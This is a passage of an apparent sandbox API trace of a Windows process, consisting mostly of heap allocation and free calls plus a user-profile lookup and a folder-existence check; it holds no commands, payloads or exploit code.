Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0199.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0199.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa750 [0199.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0199.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0199.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa828 [0199.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0199.256] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0199.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0199.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0199.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0199.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0199.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0199.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0199.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0199.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0199.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0199.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0199.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0199.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0199.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0199.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0199.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0199.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0199.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0199.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0199.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0199.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0199.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0199.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0199.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0199.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0199.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0199.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0199.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0199.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0199.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0199.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72708 [0199.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0199.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0199.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0199.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5d0 [0199.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0199.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0199.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0199.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0199.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0199.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0199.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0199.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0199.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0199.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0199.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0199.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0199.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0199.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0199.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0199.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0199.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0199.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0199.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0199.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0199.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0199.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0199.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0199.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0199.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0199.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0199.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0199.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0199.259] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0199.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0199.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0199.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0199.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0199.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0199.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0199.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0199.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0199.259] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0199.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0199.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0199.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0199.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0199.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0199.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0199.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0199.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0199.259] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0199.259] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0199.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0199.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0199.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0199.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0199.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0199.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0199.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0199.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0199.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0199.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0199.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0199.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0199.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0199.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0199.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0199.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0199.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0199.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0199.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0199.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0199.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0199.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0199.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0199.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0199.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0199.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0199.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0199.261] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0199.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0199.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0199.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0199.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0199.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0199.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0199.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0199.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0199.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0199.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0199.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0199.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0199.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0199.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0199.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0199.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0199.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0199.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0199.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0199.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0199.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0199.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0199.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0199.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0199.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0199.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0199.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0199.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0199.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0199.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0199.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0199.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0199.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0199.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0199.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0199.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0199.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0199.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0199.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0199.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0199.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0199.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0199.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0199.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0199.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0199.262] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0199.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0199.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0199.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0199.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0199.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0199.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0199.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0199.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0199.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0199.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0199.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0199.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0199.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0199.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0199.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0199.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0199.263] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0199.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0199.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0199.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0199.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0199.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0199.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0199.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0199.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0199.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0199.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0199.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0199.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0199.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0199.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0199.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0199.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0199.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0199.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0199.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0199.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0199.264] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Publishers", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e09841, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2f421af, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe3e09841, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publishers", cAlternateFileName="PUBLIS~1")) returned 0x9e2138 [0199.264] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0199.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0199.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0199.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0199.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0199.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0199.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0199.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0199.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0199.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0199.266] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0199.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0199.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0199.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0199.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0199.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0199.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0199.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0199.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0199.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0199.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0199.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0199.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0199.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0199.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: 